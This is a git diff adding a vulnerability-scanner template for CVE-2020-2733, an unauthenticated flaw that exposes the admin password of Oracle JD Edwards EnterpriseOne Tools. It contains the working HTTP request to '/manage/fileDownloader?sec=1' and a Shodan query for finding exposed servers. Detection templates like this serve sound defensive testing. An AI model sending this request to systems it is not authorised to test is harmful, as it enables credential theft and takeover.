diff --git a/cves/2020/CVE-2020-2733.yaml b/cves/2020/CVE-2020-2733.yaml
new file mode 100644
index 0000000000..6f7ef28d1f
--- /dev/null
+++ b/cves/2020/CVE-2020-2733.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-2733
+
+info:
+  name: JD Edwards EnterpriseOne Tools admin password not adequately protected
+  author: DhiyaneshDk,pussycat0x
+  severity: critical
+  description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
+  reference:
+    - https://redrays.io/cve-2020-2733-jd-edwards/
+    - https://www.oracle.com/security-alerts/cpuapr2020.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2733
+  metadata:
+    verified: true
+    shodan-query: product:"Oracle WebLogic Server"
+  tags: cve,cve2020,oracle,weblogic
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/manage/fileDownloader?sec=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ACHCJK'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200